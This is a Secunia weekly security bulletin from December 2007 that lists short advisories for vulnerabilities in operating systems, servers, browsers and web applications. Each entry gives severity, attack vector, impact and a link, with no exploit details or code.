--
[SA28167] IBM AIX Perl Regular Expressions Unicode Data Buffer Overflow
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2007-12-19

IBM has acknowledged a vulnerability in AIX, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/28167/

--
[SA28147] Ubuntu update for libgd2
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2007-12-19

Ubuntu has issued an update for libgd2. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise an application using the library.

Full Advisory: http://secunia.com/advisories/28147/

--
[SA28132] Exiv2 EXIF Parsing Integer Overflow Vulnerability
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2007-12-18

A vulnerability has been reported in Exiv2, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise an application using the library.

Full Advisory: http://secunia.com/advisories/28132/

--
[SA28114] Sun Solaris Gimp Multiple Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2007-12-18

Sun has acknowledged some vulnerabilities in Gimp, which can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/28114/

--
[SA28113] Gentoo update for cups
Critical: Moderately critical
Where: From remote
Impact: Privilege escalation, DoS, System access
Released: 2007-12-19

Gentoo has issued an update for cups.
This fixes a security issue and some vulnerabilities, which can be exploited by malicious, local users to perform certain actions with escalated privileges and by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/28113/

--
[SA28109] Red Hat update for squid
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2007-12-19

Red Hat has issued an update for squid. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28109/

--
[SA28103] Debian update for centericq
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2007-12-17

Debian has issued an update for centericq. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a user's system.

Full Advisory: http://secunia.com/advisories/28103/

--
[SA28101] Debian update for link-grammar
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2007-12-18

Debian has issued an update for link-grammar. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/28101/

--
[SA28091] Fedora update for squid
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2007-12-17

Fedora has issued an update for squid. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28091/

--
[SA28090] Gentoo update for ircservices
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2007-12-14

Gentoo has issued an update for ircservices. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/28090/

--
[SA28086] Debian update for mydns
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2007-12-17

Debian has issued an update for mydns. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28086/

--
[SA28151] Sun Management Center Default Account Security Issue
Critical: Moderately critical
Where: From local network
Impact: Security Bypass
Released: 2007-12-19

A security issue has been reported in Sun Management Center, which can be exploited by malicious people to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/28151/

--
[SA28129] CUPS SNMP Backend "asn1_get_string()" Signedness Vulnerability
Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2007-12-18

A vulnerability has been reported in CUPS, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/28129/

--
[SA28089] Avaya Products Samba "send_mailslot()" Buffer Overflow
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2007-12-14

Avaya has acknowledged a vulnerability in various Avaya products, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/28089/

--
[SA28087] HP-UX DCE swagentd Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2007-12-14

A vulnerability has been reported in HP-UX, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/28087/

--
[SA28162] Red Hat update for kernel
Critical: Less critical
Where: From remote
Impact: DoS
Released: 2007-12-20

Red Hat has issued an update for the kernel. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28162/

--
[SA28107] rPath update for tetex
Critical: Less critical
Where: From remote
Impact: Manipulation of data, Exposure of sensitive information, DoS, System access
Released: 2007-12-18

rPath has issued an update for tetex. This fixes some vulnerabilities, which can be exploited by malicious, local users to disclose and manipulate sensitive information and by malicious people to potentially compromise a vulnerable system.

Full Advisory: http://secunia.com/advisories/28107/

--
[SA28148] Sun Ray Device Manager Daemon Data Manipulation and DoS
Critical: Less critical
Where: From local network
Impact: Manipulation of data, DoS
Released: 2007-12-19

Some vulnerabilities have been reported in Sun Ray Server Software, which can be exploited by malicious, local users or malicious people to manipulate certain data or cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28148/

--
[SA28108] Slackware update for mysql
Critical: Less critical
Where: From local network
Impact: Security Bypass, Manipulation of data, DoS
Released: 2007-12-17

Slackware has issued an update for mysql. This fixes a security issue and some vulnerabilities, which can be exploited by malicious, local users to manipulate certain data and by malicious users to bypass certain security restrictions and cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28108/

--
[SA28099] Red Hat update for mysql
Critical: Less critical
Where: From local network
Impact: Manipulation of data, DoS
Released: 2007-12-19

Red Hat has issued an update for mysql.
This fixes some vulnerabilities, which can be exploited by malicious, local users to manipulate certain data and by malicious users to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28099/

--
[SA28139] Alternate pdftops Filter for CUPS Insecure Temporary Files
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2007-12-18

A security issue has been reported in the Alternate pdftops Filter for CUPS, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

Full Advisory: http://secunia.com/advisories/28139/

--
[SA28123] scponly Command Passthrough Security Bypass
Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2007-12-17

A security issue has been reported in scponly, which can be exploited by malicious, local users to bypass certain security restrictions.

Full Advisory: http://secunia.com/advisories/28123/

--
[SA28105] Linux Kernel "hrtimer_start()" Integer Overflow Vulnerability
Critical: Less critical
Where: Local system
Impact: Unknown
Released: 2007-12-17

A vulnerability with an unknown impact has been reported in the Linux Kernel.

Full Advisory: http://secunia.com/advisories/28105/

--
[SA28097] Fedora update for autofs
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2007-12-17

Fedora has issued an update for autofs. This fixes a vulnerability, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/28097/

--
[SA28094] Gentoo Portage "etc-update" Information Disclosure
Critical: Less critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2007-12-14

Gentoo has acknowledged a security issue in Portage, which can be exploited by malicious, local users to disclose potentially sensitive information.
Full Advisory: http://secunia.com/advisories/28094/

--
[SA28088] rPath update for kernel
Critical: Less critical
Where: Local system
Impact: Unknown
Released: 2007-12-19

rPath has issued an update for the kernel. This fixes a vulnerability with an unknown impact.

Full Advisory: http://secunia.com/advisories/28088/

--
[SA28181] rPath update for kdebase
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2007-12-20

rPath has issued an update for kdebase. This fixes a weakness, which can be exploited by malicious, local users to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28181/

--
[SA28104] KDE KDM Local Denial of Service Weakness
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2007-12-20

A weakness has been reported in KDE, which can be exploited by malicious, local users to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28104/

Other:
--
[SA28175] Cisco Firewall Services Module Denial of Service Vulnerability
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2007-12-20

A vulnerability has been reported in the Cisco Firewall Services Module (FWSM), which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28175/

--
[SA28100] Juniper JUNOS BGP UPDATE Message Processing Denial of Service
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2007-12-17

A vulnerability has been reported in Juniper JUNOS, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/28100/

--
[SA28096] Sun Solaris 10 NFS "netgroups" Security Bypass Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2007-12-14

Sun has acknowledged a vulnerability in Solaris, which can be exploited by malicious people to bypass certain security restrictions.
Full Advisory: http://secunia.com/advisories/28096/ -- [SA28093] NeoOffice Unspecified OpenOffice.org Vulnerability Critical: Moderately critical Where: From remote Impact: Unknown Released: 2007-12-14 A vulnerability with an unknown impact has been reported in NeoOffice. Full Advisory: http://secunia.com/advisories/28093/ Cross Platform:-- [SA28169] Opera Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, Exposure of sensitive information, System access Released: 2007-12-19 Some vulnerabilities have been reported in Opera, which can be exploited by malicious people to bypass certain security restrictions, disclose sensitive information, and compromise a user's system. Full Advisory: http://secunia.com/advisories/28169/ -- [SA28161] Adobe Flash Player Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Unknown, Security Bypass, Cross Site Scripting, Manipulation of data, Exposure of sensitive information, Privilege escalation, DoS, System access Released: 2007-12-19 Some vulnerabilities have been reported in Adobe Flash Player, where one vulnerability has an unknown impact and others can be exploited by malicious, local users to gain escalated privileges and by malicious people to bypass certain security restrictions, conduct cross-site scripting and HTTP request splitting attacks, disclose sensitive information, cause a Denial of Service (DoS), or to potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/28161/ -- [SA28117] ClamAV "cli_scanpe()" MEW Handling Integer Overflow Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2007-12-19 A vulnerability has been reported in ClamAV, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. 
Full Advisory: http://secunia.com/advisories/28117/ -- [SA28095] SquirrelMail Package Compromise Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-14 A package compromise has been reported in SquirrelMail, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28095/ -- [SA28092] Apple QuickTime Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2007-12-14 Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28092/ -- [SA28155] phpMyRealty Two SQL Injection Vulnerabilities Critical: Moderately critical Where: From remote Impact: Manipulation of data, Exposure of sensitive information Released: 2007-12-19 Koller has reported two vulnerabilities in phpMyRealty (PMR), which can be exploited by malicious people and malicious users to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/28155/ -- [SA28154] Dokeos "My productions" Multiple Extensions File Upload Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-19 A vulnerability has been discovered in Dokeos, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28154/ -- [SA28138] PunBB Automatic Image Upload with Thumbnails Module File Upload Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, System access Released: 2007-12-18 Peter sterberg has discovered a vulnerability in the Automatic Image Upload with Thumbnails module for PunBB, which can be exploited by malicious users to conduct cross-site scripting attacks and to compromise a vulnerable system. 
Full Advisory: http://secunia.com/advisories/28138/ -- [SA28137] LineShout Two Script Insertion Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-18 David Sopas has reported two vulnerabilities in LineShout, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/28137/ -- [SA28126] FreeWebshop.org Admin Credentials Information Disclosure Critical: Moderately critical Where: From remote Impact: Security Bypass, Exposure of sensitive information Released: 2007-12-17 k1tk4t has discovered a vulnerability in FreeWebshop.org, which can be exploited by malicious people to bypass certain security restrictions and to disclose sensitive information. Full Advisory: http://secunia.com/advisories/28126/ -- [SA28124] Hammer of Thyrion "HuffDecode()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-17 A vulnerability has been reported in Hammer of Thyrion, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28124/ -- [SA28119] PHP Real Estate Classifieds "id" SQL Injection Critical: Moderately critical Where: From remote Impact: Manipulation of data, Exposure of sensitive information Released: 2007-12-18 t0pP8uZz & xprog have reported a vulnerability in PHP Real Estate Classifieds, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/28119/ -- [SA28110] exiftags Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-17 Some vulnerabilities have been reported in exiftags, which potentially can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. 
Full Advisory: http://secunia.com/advisories/28110/ -- [SA28098] CourseMill Learning Management System "user" SQL Injection Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-14 sasquatch has reported a vulnerability in CourseMill Learning Management System, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/28098/ -- [SA28164] GF-3XPLORER Cross-Site Scripting and Information Disclosure Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-19 MhZ91 has discovered a vulnerability and a security issue in GF-3XPLORER, which can be exploited by malicious people to conduct cross-site scripting attacks or to disclose system information. Full Advisory: http://secunia.com/advisories/28164/ -- [SA28149] Asterisk Registration Database Security Bypass Critical: Less critical Where: From remote Impact: Security Bypass Released: 2007-12-19 A security issue has been reported in Asterisk, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28149/ -- [SA28133] Mambo Two Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-19 Beenu Arora has discovered two vulnerabilities in Mambo, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28133/ -- [SA28130] WordPress Draft Information Disclosure Critical: Less critical Where: From remote Impact: Security Bypass, Exposure of sensitive information Released: 2007-12-19 Michael Brooks has discovered a vulnerability in WordPress, which can be exploited by malicious people to bypass certain security restrictions and to disclose sensitive information. 
Full Advisory: http://secunia.com/advisories/28130/ -- [SA28122] Google Web Toolkit Benchmark Reporting System Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-18 A vulnerability has been reported in Google Web Toolkit, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28122/ -- [SA28116] Ganglia Web Interface Multiple Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-17 Some vulnerabilities have been reported in Ganglia, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28116/ -- [SA28106] Flyspray Two Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-17 Two vulnerabilities have been reported in Flyspray, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28106/ -- [SA28118] syslog-ng Timestamps Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2007-12-18 A vulnerability has been reported in syslog-ng, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28118/ ===========